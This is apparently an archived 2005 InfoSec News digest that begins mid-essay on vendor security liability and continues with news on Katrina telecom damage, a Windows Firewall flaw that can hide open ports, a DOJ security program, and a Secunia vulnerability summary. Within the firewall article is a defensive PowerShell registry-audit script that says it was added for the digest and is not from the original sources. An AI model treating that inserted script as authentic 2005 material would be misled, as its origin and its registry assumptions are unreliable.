However, it can be months before patches are released, and they are oftentimes only available to customers running the latest version of a piece of software, a tactic that encourages upgrades. In addition, vendors derive revenue from patch management services. Meanwhile, many legitimate researchers are running scared, and opting to co-operate with vendors in return for their largesse and approval.

So where does this leave us? Can we at least rely on security software to keep us safe? Alas, not as a matter of course.

In recent years, the US Federal Trade Commission (FTC) has reprimanded companies, including Microsoft, Guess and Tower Records, for misrepresenting the effectiveness of their security practices. Security product vendors have received similar heat for making false or misleading claims about their products to the public.

For example, the FTC recently got a temporary injunction and asset freezing order against Trustsoft, a Texas-based company, accusing it of misleading and deceptive advertising, and of spamming consumers, pursuant to the US CAN-SPAM Act. According to the FTC, Trustsoft falsely represented to consumers that its software had scanned their PCs and located spyware. It used "frightening pop-ups" to try to persuade people to purchase their product to remove spyware, a task it was not in fact capable of performing. The FTC alleged that the supposed scans completed on consumers' PCs were 'nothing more than computer graphics that have no computer scanning capabilities'.

Even hardware vendors are not immune.
Advanced Micro Devices (AMD), the computer chip manufacturer, was recently taken to task by Dutch regulators for advertising a new chip as a way to prevent virus outbreaks in the Netherlands. A complaint was made to the Dutch consumer commission about an AMD radio advertisement in Holland that apparently stated that the new AMD64 processor would ensure people would "no longer have to worry about viruses". Reports indicate that the regulator found that some of the radio ads were "too absolute and as a result misleading."

In June 2005, Lorrie Cranor, Associate Research Professor at the Institute for Software Research at Carnegie Mellon University, presented the disquieting results of research carried out by her team. They examined the performance of six commercial privacy tools, marketed as capable of permanently wiping data from computers to protect data privacy. The researchers were able in most cases to recover sensitive data; files were not properly overwritten, and in one case the product tested 'completely failed' to do anything useful. Users of such products were clearly left with a false sense of security that their data had been successfully erased. The vendors were contacted by the researchers, and the vast majority failed to respond.

Unfortunately, flaws in security products are nothing new. Indeed, The Yankee Group research company has recently indicated that the security industry needs to pull up its socks in a big way, since the number of vulnerabilities in products that are supposed to protect us continues to escalate at an alarming rate.

All this is to say that as long as vendors are impervious to entreaty and immune from legal liability, corporate customers should, where possible, take matters into their own hands and employ a wide range of defensive measures to make it harder for hackers to access vulnerable systems.
The speed at which the recent Zotob worm hit several Canadian banks and media outlets in the U.S., such as CNN, ABC, and the New York Times, has convinced many experts that "there is no more patch window." That worm exploits a security hole in the plug-and-play feature of the Windows 2000 operating system. Microsoft had released a patch for the bug as part of its monthly patching cycle shortly before the outbreak, but new exploits emerged within three days of the patch release, before many machines had been updated with the security fix.

Johannes Ullrich, chief research officer at the SANS Internet Storm Center, in one of the security group's daily alerts, advised companies to rely on "defense in depth" strategies to "survive the early release of malware." In other words, the bad guys are outmanoeuvring the security vendors, and it is every man for himself.

Government and big business may have the resources and political clout to take matters into their own hands, and/or to make vendors sit up and take note, but the consumer does not. What can he/she expect by way of protection?

There are indications that the FTC in the U.S. is taking a hard look at claims made by vendors who market consumer products, and that they are determined to at least hold them to the truth of publicly made assertions about them. Can we expect the Competition Bureau in Canada to follow suit? Vendors surely cannot be expected to have their cake and eat it too.
From isn at c4i.org Fri Sep 2 06:49:20 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 2 06:53:25 2005
Subject: [ISN] Telecoms face 'one big mess' in Gulf Coast region
Message-ID:

http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104324,00.html

By Matt Hamblen
SEPTEMBER 01, 2005
COMPUTERWORLD

Cellular and other communication services are gradually improving in the Gulf Coast region more than three days after Hurricane Katrina blasted through, but service providers said today they still can't reach equipment in the flooded city of New Orleans to make needed repairs.

Officials at Cingular Wireless LLC, Verizon Wireless, Sprint Corp. and BellSouth Corp. reported separately at noon today that with flooding and power outages in New Orleans, crews can't access cellular sites and switching stations for repairs. Sprint's crews are waiting in Baton Rouge, La., until officials say it's safe to enter New Orleans, a spokesman said.

Telecommunications have improved, however, in places such as Baton Rouge, Mobile, Ala., and Pensacola, Fla., company spokesmen said in separate interviews. The carriers are all relying on backup generators and in some cases portable generators and cellular transceivers carried on panel trucks. When possible, the carriers are also increasing power to rooftop cell sites in New Orleans to boost signals, the spokesmen said.

Despite a massive effort with thousands of repair workers on the scene, the situation is obviously difficult, said Jeff Kagan, an independent telecommunications analyst in Atlanta. "All the carriers are still in survival mode," he said. "Some cities are better than others, but it is all one big mess."

"I think it will be a long time before we can determine how each carrier is doing, but it will not be easy," Kagan said. "This is much worse than the 9/11 emergency. It is not just a part of a city like New York. It is the entire Southeast that has been devastated.

"You have to be able to run repair trucks, but first you have to clear the streets," he continued. "Some areas can be repaired quickly, and other areas will take weeks and months. It is not pretty, but the carriers are working hard to get service back up and running."

Only a small portion of a cellular call is carried over a wireless link, with cell sites usually connected to the rest of a network through T1 or fiber-optic connections, the spokesmen said. "Flooding has its most dramatic effect on land lines, such as T1s and fiber," said Verizon spokesman Patrick Kimball. "It's still a very difficult situation" in New Orleans.

Where there is service, even in restored areas, network congestion is high, and land-line users have heard "all circuits are busy" or a fast busy signal, Bill Oliver, BellSouth's president of Louisiana operations, said in a statement. The wireless providers urged callers to use text messaging as an alternative to voice calls, partly because it requires less bandwidth.

None of the carriers could predict when service will resume, but Oliver said "key fiber breaks" in southeastern Louisiana will take more resources to repair. Of about 1 million landline phones in Louisiana that were out of service after the deadly storm hit on Monday, only 130,000 have been restored so far, Oliver said.

Various reports from New Orleans tell of desperate survivors offering to pay strangers to use a cell phone to reach family and friends.

Meanwhile, a few companies in the Gulf Coast region set up communications backup plans in advance of Katrina, which has left hundreds, perhaps thousands, of people dead. For example, Siemens Enterprise Networks is working with a power utility in Mississippi that has been sending repair crews into the field with voice-over-Internet Protocol (VoIP) phones to make wireless calls via a satellite network, said Tim Perez, a Siemens director of sales.
He wouldn't identify the utility, but said the system has been the main means of voice communications for utility crew supervisors in the field, supplemented by Research In Motion Ltd. BlackBerry handhelds for e-mail access. In this case, Siemens acted as integrator to arrange for satellite network bandwidth, allowing the users to connect to a Siemens IP-based voice switch in Atlanta. With the Siemens VoIP phones, the workers can make five-digit calls over a familiar device to co-workers without needing special codes for the satellite links, Perez said. "It provides business as close-to-usual under very unusual circumstances," he said.

All of the wireless carriers in the region have supplied thousands of cell phones to be used by relief workers and emergency personnel. Even so, the cell phones are only as good as the network that supports them, said Jack Gold, an independent wireless industry analyst based in Westboro, Mass. "When stuff's under water, electrical stuff doesn't work," he said. "Fundamentally, you are still dealing with the laws of physics."

Gold said emergency personnel and utility workers from hundreds of different groups face the same lack of radio interoperability with their private system emergency radios that has plagued police and fire departments for decades. The hurricane and the resulting flooding are another reminder that "we're not moving fast enough" to create emergency radio interoperability for responding to homeland security and natural disaster emergencies.

"There's a lot of work to be done with radio interoperability, since we have 80 years of private radio networks as an installed base," he said. Gold noted that Austin and its suburbs, as well as some communities in California, are working together to find common radios. But most municipalities don't have the funds to abandon their systems.
A number of small companies are offering portable mesh networks that work over Wi-Fi and can be driven to disasters on short notice to provide a common IP platform so utilities, police, fire and other officials have interoperable communications, Gold said. "One universal IP network would help, but how you coordinate that is the problem," he said.

From isn at c4i.org Fri Sep 2 06:49:35 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 2 06:54:00 2005
Subject: [ISN] Windows Firewall flaw may hide open ports
Message-ID:

http://news.com.com/Windows+Firewall+flaw+may+hide+open+ports/2100-7355_3-5845850.html

By Joris Evers
Staff Writer, CNET News.com
September 1, 2005

A flaw in Windows Firewall may prevent users from seeing all the open network ports on a Windows XP or Windows Server 2003 computer.

The flaw manifests itself in the way the security application handles some entries in the Windows Registry, Microsoft said in a security advisory published Wednesday. The Windows Registry stores PC settings and is a core part of the operating system.

The bug could allow a firewall port to be open without the user being informed through the standard Windows Firewall user interface, according to the Microsoft advisory. The company has released a fix that can be downloaded from Microsoft's Web site and will be part of a future Windows service pack, the company said.

Microsoft said the firewall issue is not a security vulnerability but said the flaw could be used by an attacker who already compromised a system in an attempt to hide exceptions in the firewall.

For example, miscreants who have penetrated a computer could create and hide a firewall exception by inserting a malformed Windows Firewall exception entry in the Windows Registry. "An attacker who already compromised the system would create such malformed registry entries with the intent to confuse a user," Microsoft said.
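An added audit script, written for this digest and not taken from the CNET article or from Microsoft's advisory, that shows the defender's side of the mechanism described above: it reads the Windows Firewall exception lists for the Domain and Standard profiles straight from the registry, flags any entry whose layout departs from the documented port or application format (the kind of entry the advisory says the firewall UI may fail to display), and finishes with the netsh command the advisory itself recommends so the two views can be compared by hand. The FirewallPolicy registry paths and the colon-separated value layouts are the ones Windows XP SP2 and Server 2003 SP1 use; they are assumptions of this example, not facts stated on the page.

```powershell
# Added audit example (not from the CNET article or Microsoft's advisory).
# Reads the Windows Firewall exception lists for the Domain and Standard
# profiles straight from the registry on Windows XP SP2 / Server 2003 SP1
# and flags entries whose layout departs from the documented format, since
# the advisory says such entries may not appear in the firewall UI.
# ASSUMPTION: these are the standard FirewallPolicy registry paths; confirm
# them on the build being audited.  Run from an elevated prompt.

$FirewallPolicy = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy'
$ProfileNames   = @('DomainProfile', 'StandardProfile')

function Test-PortException {
    # Documented layout of a GloballyOpenPorts\List entry:
    #   value name = "<port>:<TCP|UDP>"
    #   value data = "<port>:<TCP|UDP>:<scope>:<Enabled|Disabled>:<display name>"
    param([string]$Name, [string]$Data)
    $f = $Data -split ':'
    if ($f.Count -lt 5)                               { return $false }
    if ($f[0] -notmatch '^\d{1,5}$')                  { return $false }
    if (@('TCP', 'UDP') -notcontains $f[1].ToUpper()) { return $false }
    if (@('Enabled', 'Disabled') -notcontains $f[3])  { return $false }
    # the value name must agree with the port and protocol inside the data
    return ($Name -eq ($f[0] + ':' + $f[1]))
}

function Test-AppException {
    # Documented layout of an AuthorizedApplications\List entry:
    #   value name = "<full path to executable>"
    #   value data = "<full path to executable>:<scope>:<Enabled|Disabled>:<display name>"
    # A drive-letter path contributes one extra ':' so a well-formed entry
    # splits into at least five fields; anything else (including UNC paths)
    # is reported as suspect and left for manual review.
    param([string]$Name, [string]$Data)
    $f = $Data -split ':'
    if ($f.Count -lt 5)                               { return $false }
    if (($f[0] + ':' + $f[1]) -ne $Name)              { return $false }
    if (@('Enabled', 'Disabled') -notcontains $f[3])  { return $false }
    return $true
}

function Get-FirewallExceptionAudit {
    $results = @()
    foreach ($prof in $ProfileNames) {
        $lists = @(
            @{ Kind = 'Port'; Key = "$FirewallPolicy\$prof\GloballyOpenPorts\List";     Check = 'Test-PortException' },
            @{ Kind = 'App';  Key = "$FirewallPolicy\$prof\AuthorizedApplications\List"; Check = 'Test-AppException' }
        )
        foreach ($list in $lists) {
            if (-not (Test-Path $list.Key)) { continue }
            $check = $list.Check
            $props = Get-ItemProperty -Path $list.Key
            foreach ($p in $props.PSObject.Properties) {
                # Get-ItemProperty adds PSPath, PSParentPath, ... bookkeeping members; skip them
                if ($p.Name -like 'PS*') { continue }
                $ok = & $check -Name $p.Name -Data ([string]$p.Value)
                $results += New-Object PSObject -Property @{
                    Profile    = $prof
                    Kind       = $list.Kind
                    Name       = $p.Name
                    Data       = [string]$p.Value
                    WellFormed = $ok
                }
            }
        }
    }
    return $results
}

$audit   = @(Get-FirewallExceptionAudit)
$suspect = @($audit | Where-Object { -not $_.WellFormed })

$audit | Sort-Object WellFormed, Profile, Kind |
    Format-Table Profile, Kind, WellFormed, Name, Data -AutoSize

Write-Host ("{0} exception entries read from the registry, {1} malformed" -f $audit.Count, $suspect.Count)

# Cross-check against the command the advisory recommends: it enumerates the
# active exceptions independently of how the firewall UI parsed the registry.
netsh firewall show state verbose = ENABLE
```

A malformed entry is a review item, not proof of tampering: what the advisory points at is disagreement between the three views, so an entry that the registry holds, netsh reports as active, and the Windows Firewall control panel does not list is the one to investigate, and applying Microsoft's fix restores agreement between the UI and the other two.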
Like other firewall software, Windows Firewall is meant to block incoming traffic to a computer. Users can allow incoming connections by creating exceptions. Windows Firewall displays these exceptions in the firewall UI, which can be reached by going to the Windows Control Panel and selecting Windows Firewall.

PC users can view all firewall exceptions--including those the unpatched Windows Firewall doesn't see--through other tools, Microsoft notes. Typing "netsh firewall show state verbose = ENABLE" at a command prompt will display all active exceptions, the company said in its advisory.

Copyright © 1995-2005 CNET Networks, Inc.

From isn at c4i.org Fri Sep 2 06:50:39 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 2 06:56:46 2005
Subject: [ISN] DOJ cybersecurity effort aims for Center of Excellence status
Message-ID:

http://www.gcn.com/vol1_no1/daily-updates/36875-1.html

By Rob Thormeyer
GCN Staff
09/01/05

The Justice Department will attempt to become a Center of Excellence for the Cybersecurity Line of Business initiative, a senior agency official said.

Dennis Heretick, DOJ's chief information security officer and director of the agency's IT security staff, said yesterday at a workshop in Washington that the department will submit a business case to the Office of Management and Budget outlining how its Cyber Security Risk and Assessment and Management program could become a standard for federal agencies.

Justice launched CSAM to document measures the agency takes to maintain the security of its IT systems, Heretick said, and he described it as similar to a Defense Department initiative. Heretick said Justice implemented "best practices" from the Transportation, State and Homeland Security departments, as well as the intelligence community.
Heretick, speaking at an Information Security Report Card Symposium sponsored by the CIO Council, said the CSAM program also relied heavily on Justice's Certification and Accreditation client and TrustedAgent, a data-management program developed by Trusted Integration Inc. of Alexandria, Va., that streamlines and standardizes Federal Information Security Management Act information.

"These tools provide online procedures, templates and subject-matter expert help instructions that allow us to emphasize implementing security versus spending on documenting security plans," Heretick said.

The Cybersecurity Line of Business initiative is an effort by OMB to get a clear understanding of how much money federal agencies are spending on IT security.

DOJ is one of a handful of agencies seeking to become a Center of Excellence; the other agencies were unknown at press time.

From isn at c4i.org Fri Sep 2 06:49:48 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 2 06:57:21 2005
Subject: [ISN] Secunia Weekly Summary - Issue: 2005-35
Message-ID:

========================================================================

The Secunia Weekly Advisory Summary
2005-08-25 - 2005-09-01

This week : 64 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information. Every single vulnerability report is being validated and verified before a Secunia advisory is written.

Secunia validates and verifies vulnerability reports in many different ways, e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued.

As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet.

Secunia Online Vulnerability Database:
http://secunia.com/

========================================================================
2) This Week in Brief:

A vulnerability has been reported in mplayer, which potentially can be exploited by malicious people to compromise a vulnerable system.

Additional details can be found in the referenced Secunia advisory below.

Reference:
http://secunia.com/SA16509

VIRUS ALERTS:

Secunia has not issued any virus alerts during the week.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1.  [SA16560] Windows Registry Editor Utility String Concealment Weakness
2.  [SA16105] Skype "skype_profile.jpg" Insecure Temporary File Creation
3.  [SA16480] Microsoft DDS Library Shape Control Code Execution Vulnerability
4.  [SA16466] Adobe Acrobat / Reader Plug-in Buffer Overflow Vulnerability
5.  [SA16562] Symantec AntiVirus Corporate Edition / Client Security Privilege Escalation
6.  [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability
7.  [SA16559] Apache Byte-Range Filter Denial of Service Vulnerability
8.  [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerabilities
9.  [SA16598] Simple PHP Blog Image File Upload Vulnerability
10. [SA16494] Linux Kernel Denial of Service and IPsec Policy Bypass

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA16629] BFCommand & Control Server Manager Multiple Vulnerabilities
[SA16613] BNBT EasyTracker Denial of Service Vulnerability
[SA16615] BlueWhaleCRM "Account ID" SQL Injection Vulnerability

UNIX/Linux:
[SA16637] Slackware update for gaim
[SA16635] Slackware update for php
[SA16631] Debian update for php4
[SA16628] Red Hat update for evolution
[SA16621] Gentoo update for phpgroupware
[SA16619] SUSE update for php4/php5
[SA16601] Fedora update for lesstif
[SA16593] Gentoo update for phpwiki
[SA16592] Fedora update for openmotif
[SA16589] Fedora update for php
[SA16576] Debian update for simpleproxy
[SA16644] Avaya Multiple Ethereal Vulnerabilities
[SA16638] Slackware update for pcre
[SA16634] Debian update for kismet
[SA16624] Debian update for pstotext
[SA16618] SUSE update for pcre
[SA16614] UMN Gopher "VIfromLine()" Buffer Overflow Vulnerability
[SA16600] SqWebMail HTML Emails Script Insertion Vulnerability
[SA16599] Mandriva update for gnumeric
[SA16587] Gentoo update for libpcre
[SA16584] Gnumeric PCRE Integer Overflow Vulnerability
[SA16582] Mandriva update for bluez-utils
[SA16581] Mandriva update for pcre
[SA16580] Mandriva update for php
[SA16575] Mandriva update for python
[SA16574] Affix Device Name Shell Command Injection Vulnerability
[SA16641] Avaya PDS HP-UX Unspecified Security Bypass Vulnerability
[SA16643] Avaya gzip Directory Traversal Vulnerability
[SA16636] Debian update for phpldapadmin
[SA16622] Avaya Media Servers rsh Directory Traversal Vulnerability
[SA16603] Ubuntu update for courier-base
[SA16590] Fedora update for freeradius
[SA16588] Debian update for libpam-ldap
[SA16578] Astaro Security Linux Proxy Security Issue
[SA16642] Avaya OpenSSL "der_chop" Script Insecure Temporary File Creation
[SA16626] Gentoo update for lm_sensors
[SA16610] Debian update for maildrop
[SA16608] Fedora update for kernel
[SA16591] Debian update for backup-manager
[SA16586] HP-UX Veritas File System Security Bypass Vulnerability
[SA16579] Mandriva update for lm_sensors
[SA16606] Fedora update for ntp
[SA16602] NTP Incorrect Group Permissions Security Issue

Other:
[SA16640] Novell NetWare CIFS Denial of Service Vulnerability

Cross Platform:
[SA16627] FUDforum Avatar Upload Vulnerability
[SA16620] AutoLinks Pro "alpath" File Inclusion Vulnerability
[SA16617] phpLDAPadmin welcome.php Arbitrary File Inclusion
[SA16607] Looking Glass Cross-Site Scripting and Shell Command Injection
[SA16585] Quake 2 Lithium II Mod Nickname Format String Vulnerability
[SA16632] PHP-Fusion Nested BBcode "url" Script Insertion Vulnerability
[SA16625] Cosmoshop Login SQL Injection Vulnerability
[SA16623] Helpdesk software Hesk Authentication Bypass Vulnerability
[SA16616] Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion
[SA16612] FreeStyle Wiki Arbitrary Command Injection Vulnerability
[SA16597] PhotoPost PHP Pro EXIF Data Script Insertion Vulnerability
[SA16596] YaPig EXIF Data Script Insertion Vulnerability
[SA16595] phpGraphy EXIF Data Script Insertion Vulnerability
[SA16594] Gallery EXIF Data Script Insertion and File Disclosure Vulnerability
[SA16611] phpLDAPadmin Anonymous Bind Security Bypass
[SA16605] phpMyAdmin Two Cross-Site Scripting Vulnerabilities
[SA16598] Simple PHP Blog Image File Upload Vulnerability

========================================================================
5) Vulnerabilities Content Listing

Windows:
--

[SA16629] BFCommand & Control Server Manager Multiple Vulnerabilities
Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass
Released:    2005-08-30

Luigi Auriemma has reported some vulnerabilities in BFCommand & Control Server Manager, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/16629/

--

[SA16613] BNBT EasyTracker Denial of Service Vulnerability
Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2005-08-30

Sowhat has discovered a vulnerability in BNBT EasyTracker, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/16613/

--

[SA16615] BlueWhaleCRM "Account ID" SQL Injection Vulnerability
Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data
Released:    2005-08-30

Kutbuddin Trunkwala has reported a vulnerability in BlueWhaleCRM, which can be exploited by malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/16615/

UNIX/Linux:
--

[SA16637] Slackware update for gaim
Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-08-31

Slackware has issued an update for gaim. This fixes a vulnerability and two weaknesses, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a user's system.

Full Advisory:
http://secunia.com/advisories/16637/

--

[SA16635] Slackware update for php
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2005-08-31

Slackware has issued an update for php. This fixes two vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16635/

--

[SA16631] Debian update for php4
Critical:    Highly critical
Where:       From remote
Impact:      Privilege escalation, System access
Released:    2005-08-30

Debian has issued an update for php4. This fixes some vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges, or by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/16631/

--

[SA16628] Red Hat update for evolution
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2005-08-30

Red Hat has issued an update for evolution. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16628/

--

[SA16621] Gentoo update for phpgroupware
Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, System access
Released:    2005-08-31

Gentoo has issued an update for phpgroupware. This fixes some vulnerabilities, which can be exploited by malicious administrative users to conduct script insertion attacks, or by malicious people to bypass certain security restrictions or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16621/

--

[SA16619] SUSE update for php4/php5
Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-08-31

SUSE has issued updates for php4 and php5. These fix some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16619/

--

[SA16601] Fedora update for lesstif
Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-08-29

Fedora has issued an update for lesstif. This fixes multiple vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/16601/

--

[SA16593] Gentoo update for phpwiki
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2005-08-26

Gentoo has issued an update for phpwiki. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/16593/

--

[SA16592] Fedora update for openmotif
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2005-08-26

Fedora has issued an update for openmotif. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16592/

--

[SA16589] Fedora update for php
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2005-08-26

Fedora has issued an update for php. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16589/

--

[SA16576] Debian update for simpleproxy
Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2005-08-26

Debian has issued an update for simpleproxy. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16576/

--

[SA16644] Avaya Multiple Ethereal Vulnerabilities
Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-08-31

Avaya has acknowledged some vulnerabilities in Ethereal included in some products, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16644/

--

[SA16638] Slackware update for pcre
Critical:    Moderately critical
Where:       From remote
Impact:      System access, DoS
Released:    2005-08-31

Slackware has issued an update for pcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16638/

--

[SA16634] Debian update for kismet
Critical:    Moderately critical
Where:       From remote
Impact:      Unknown, System access
Released:    2005-08-30

Debian has issued an update for Kismet.
This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16634/ -- [SA16624] Debian update for pstotext Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-01 Debian has issued an update for pstotext. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16624/ -- [SA16618] SUSE update for pcre Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-31 SUSE has issued an update for pcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16618/ -- [SA16614] UMN Gopher "VIfromLine()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-30 vade79 has discovered a vulnerability in Gopher client, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16614/ -- [SA16600] SqWebMail HTML Emails Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-29 Secunia Research has discovered a vulnerability in SqWebMail, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16600/ -- [SA16599] Mandriva update for gnumeric Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-29 Mandriva has issued an update for gnumeric. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/16599/ -- [SA16587] Gentoo update for libpcre Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-26 Gentoo has issued an update for libpcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16587/ -- [SA16584] Gnumeric PCRE Integer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-29 A vulnerability has been reported in Gnumeric, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16584/ -- [SA16582] Mandriva update for bluez-utils Critical: Moderately critical Where: From remote Impact: Security Bypass, System access Released: 2005-08-26 Mandriva has issued an update for bluez-utils. This fixes a vulnerability, which can be exploited by malicious people to bypass certain security restrictions or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16582/ -- [SA16581] Mandriva update for pcre Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-26 Mandriva has issued an update for pcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16581/ -- [SA16580] Mandriva update for php Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-26 Mandriva has issued an update for php. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16580/ -- [SA16575] Mandriva update for python Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-29 Mandriva has issued an update for python. 
This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16575/ -- [SA16574] Affix Device Name Shell Command Injection Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-29 Kevin Finisterre has reported a vulnerability in Affix, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16574/ -- [SA16641] Avaya PDS HP-UX Unspecified Security Bypass Vulnerability Critical: Moderately critical Where: From local network Impact: Security Bypass Released: 2005-08-31 Avaya has acknowledged a vulnerability in Avaya PDS (Predictive Dialing System), which potentially can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16641/ -- [SA16643] Avaya gzip Directory Traversal Vulnerability Critical: Less critical Where: From remote Impact: Security Bypass, Manipulation of data Released: 2005-08-31 Avaya has acknowledged a vulnerability in gzip included in some products, which potentially can be exploited by malicious people to extract files to arbitrary directories on a user's system. Full Advisory: http://secunia.com/advisories/16643/ -- [SA16636] Debian update for phpldapadmin Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-08-30 Debian has issued an update for phpldapadmin. This fixes a security issue, which can be exploited by malicious people to bypass certain security restrictions. 
Full Advisory: http://secunia.com/advisories/16636/ -- [SA16622] Avaya Media Servers rsh Directory Traversal Vulnerability Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2005-08-31 Avaya has acknowledged a vulnerability in rsh included in S8XXX Media Servers, which potentially can be exploited by malicious people to overwrite arbitrary files on a vulnerable system. Full Advisory: http://secunia.com/advisories/16622/ -- [SA16603] Ubuntu update for courier-base Critical: Less critical Where: From remote Impact: DoS Released: 2005-08-29 Ubuntu has issued an update for courier-base. This fixes a vulnerability, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16603/ -- [SA16590] Fedora update for freeradius Critical: Less critical Where: From remote Impact: Manipulation of data, DoS Released: 2005-08-26 Fedora has issued an update for freeradius. This fixes some vulnerabilities, which potentially can be exploited by malicious users to conduct SQL injection attacks or to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16590/ -- [SA16588] Debian update for libpam-ldap Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-08-26 Debian has issued an update for libpam-ldap. This fixes a security issue, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16588/ -- [SA16578] Astaro Security Linux Proxy Security Issue Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-08-29 Oliver Karow has reported a security issue in Astaro Secure Linux, which can be exploited by malicious people to bypass certain security restrictions. 
